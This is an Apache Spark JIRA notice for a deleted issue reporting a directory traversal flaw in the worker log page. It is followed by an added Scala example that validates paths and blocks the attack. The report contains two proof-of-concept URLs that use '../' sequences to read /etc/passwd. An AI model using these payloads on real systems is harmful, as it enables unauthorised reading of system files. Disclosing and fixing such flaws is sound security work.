Posted to issues@spark.apache.org by "Patrick Wendell (JIRA)" <ji...@apache.org> on 2015/06/03 19:29:38 UTC
[jira] [Deleted] (SPARK-8073) Directory traversal vulnerability
[ https://issues.apache.org/jira/browse/SPARK-8073?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Patrick Wendell deleted SPARK-8073:
-----------------------------------
> Directory traversal vulnerability
> ---------------------------------
>
> Key: SPARK-8073
> URL: https://issues.apache.org/jira/browse/SPARK-8073
> Project: Spark
> Issue Type: Bug
> Environment: Centos6.4
> Reporter: 0keeTeam
> Priority: Critical
>
> We are an information security team from QIHU 360 company, China.
> We found a 0day vulnerability in Spark and are writing to apply for a CVE ID. Please refer to the report below. Thanks!
> [Team info]
> name: 0keeTeam
> company: QIHU 360 company, China
> email: g-sec-web@360.cn
> Details of the vulnerability are as follows:
> Poc&Exp:
> http://xxx.com/logPage/?appId=../../../../../../../../../../../../../../../&executorId=&logType=etc/passwd
> or:
> http://xxx.com/logPage/?driverId=../../../../../../../../../../../../../../../&logType=etc/passwd
> *spark-1.3.1\core\src\main\scala\org\apache\spark\deploy\worker\ui\LogPage.scala : Line36:*
> {quote}
> // parameters get from GET are not filtered
> val appId = Option(request.getParameter("appId"))
> val executorId = Option(request.getParameter("executorId"))
> val driverId = Option(request.getParameter("driverId"))
> val logType = request.getParameter("logType")
> val offset = Option(request.getParameter("offset")).map(_.toLong)
> val byteLength = Option(request.getParameter("byteLength")).map(_.toInt).getOrElse(defaultBytes)
> ........
> val (logText, startByte, endByte, logLength) = getLog(logDir, logType, offset, byteLength)
> {quote}
> *and Line125:*
> {quote}
> private def getLog(
> ........
> val files = RollingFileAppender.getSortedRolledOverFiles(logDirectory, logType)
> ........
> val logText = Utils.offsetBytes(files, startIndex, endIndex)
> {quote}
> *spark-1.3.1\core\src\main\scala\org\apache\spark\util\logging\RollingFileAppender.scala :Line152:*
> {quote}
> def getSortedRolledOverFiles(directory: String, activeFileName: String):
> ........
> val file = new File(directory, activeFileName).getAbsoluteFile
> ........
> {quote}
--
This message was sent by Atlassian JIRA
(v6.3.4#6332)
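The report above shows the worker's LogPage building a log path from unfiltered request parameters and handing it to `new File(directory, activeFileName)`. The following is an added example written for this page, not Spark's own code or its eventual fix: it applies an allow-list to each parameter and then a canonical-path containment check, and shows the PoC values from the report being rejected. The object and method names, and the temporary work-dir layout, are assumptions.

```scala
import java.io.File
import java.nio.file.Files

// Added example, not Spark's own code: a containment check for the log file
// path that LogPage builds from the untrusted appId/executorId/driverId and
// logType request parameters. Object and method names are assumed.
object SafeLogPath {
  // Plain identifiers only: no separators and no leading dot, so "." and ".."
  // are rejected before any path is built.
  private val PlainId = "^[A-Za-z0-9_-][A-Za-z0-9._-]*$".r

  def isPlainId(s: String): Boolean = PlainId.findFirstIn(s).isDefined

  // Resolves `relative` under `workDir` and returns it only if the canonical
  // result is still inside workDir. getCanonicalFile collapses "..", follows
  // symlinks and normalises separators, so the prefix check is on real paths.
  def resolveInside(workDir: File, relative: String): Option[File] = {
    val base = workDir.getCanonicalFile
    val candidate = new File(base, relative).getCanonicalFile
    // Trailing separator so "/srv/work" does not accept "/srv/work2/x".
    val prefix = base.getPath.stripSuffix(File.separator) + File.separator
    if (candidate.getPath.startsWith(prefix)) Some(candidate) else None
  }

  // Hardened equivalent of the page's logDir + logType lookup: two layers of
  // defence, an allow-list on each parameter and a canonical-path check.
  def executorLogFile(workDir: File, appId: String, executorId: String,
                      logType: String): Option[File] =
    if (Seq(appId, executorId, logType).forall(isPlainId))
      resolveInside(workDir, s"$appId/$executorId/$logType")
    else None

  def main(args: Array[String]): Unit = {
    // Constructed layout: <tmp>/app-1/0/stdout, as a worker's work dir would have.
    val workDir = Files.createTempDirectory("spark-work").toFile
    val stdout = new File(workDir, "app-1/0/stdout")
    stdout.getParentFile.mkdirs()
    Files.write(stdout.toPath, "hello\n".getBytes("UTF-8"))

    println("legitimate: " + executorLogFile(workDir, "app-1", "0", "stdout"))
    // The PoC values from the report are stopped by the allow-list.
    println("poc (allow-list): " +
      executorLogFile(workDir, "../../../../../../../../../", "", "etc/passwd"))
    // Even with the allow-list skipped, the canonical check refuses the escape.
    println("poc (canonical): " +
      resolveInside(workDir, "../../../../../../../../../etc/passwd"))
  }
}
```

Run with `scala SafeLogPath.scala`; the legitimate lookup yields `Some(...)` and both PoC lookups yield `None`.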